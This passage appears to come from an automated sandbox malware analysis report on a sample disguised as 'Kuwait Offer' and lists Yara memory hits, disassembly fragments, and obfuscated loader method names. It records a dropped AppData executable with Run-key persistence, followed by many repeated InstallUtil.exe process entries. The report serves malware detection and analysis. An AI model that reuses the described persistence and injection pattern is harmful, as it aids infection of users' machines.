                    Source: Yara match File source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_062E4C55 push es; retf 0_2_062E4C60
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_062E4BCB push es; iretd 0_2_062E4BCC
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_0634968D push esi; ret 0_2_0634968E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_063474C0 push 00000033h; iretd 0_2_063474C4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_0634CD8A push eax; retf 0_2_0634CD91
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06357740 push edi; ret 0_2_06357743
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06359D06 push es; retf 0_2_06359D20
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06359AAD push es; retf 0_2_06359AC4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06359B19 push es; ret 0_2_06359B20
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_0635FBB0 push es; ret 0_2_0635FC60
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_063598E2 push es; iretd 0_2_063598E8
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_0635699C pushfd ; ret 0_2_0635699E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_063599ED push es; ret 0_2_063599F4
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_0662B689 push es; retf 0_2_0662B68C
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06631638 pushad ; retf 0_2_06631641
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Code function: 0_2_06631AB0 push eax; iretd 0_2_06631AB1
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_0579CD8B push eax; retf 3_2_0579CD91
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_0579968D push esi; ret 3_2_0579968E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_057A7740 push edi; ret 3_2_057A7743
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_057A699C pushfd ; ret 3_2_057A699E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_05A81638 pushad ; retf 3_2_05A81641
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 3_2_05A81A43 push eax; iretd 3_2_05A81AB1
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05C80108 pushad ; retf 8_2_05C80A49
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05C80101 pushad ; retf 8_2_05C80A49
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05C80D13 push eax; iretd 8_2_05C80D1D
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05C82FDF push D805A6D2h; iretd 8_2_05C83035
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05C82FE0 push D805A6D2h; iretd 8_2_05C83035
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05CBCD8B push eax; retf 8_2_05CBCD91
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05CBB7C0 push dword ptr [ebp-4D8CFA35h]; retf 8_2_05CBB7C6
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05CB968D push esi; ret 8_2_05CB968E
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Code function: 8_2_05CB9E24 pushfd ; retf 8_2_05CB9E26
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'v2V6nCvtUAkjCCigSxf'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, EK5X3A29oW0SqGSnjDt.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'hXi2TH708w', 'NtProtectVirtualMemory', 'LPxYtYttkhqhMQsPuW0', 'e2PB3ttNj8qHWJ9ZPMq', 'hPYqbdtJuQ9XXyoRnjk', 'Gajt5GtIwQ7iGjkXEcA'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.61c0000.7.raw.unpack, EK5X3A29oW0SqGSnjDt.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'hXi2TH708w', 'NtProtectVirtualMemory', 'LPxYtYttkhqhMQsPuW0', 'e2PB3ttNj8qHWJ9ZPMq', 'hPYqbdtJuQ9XXyoRnjk', 'Gajt5GtIwQ7iGjkXEcA'
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe File created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hxfzsthbd
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
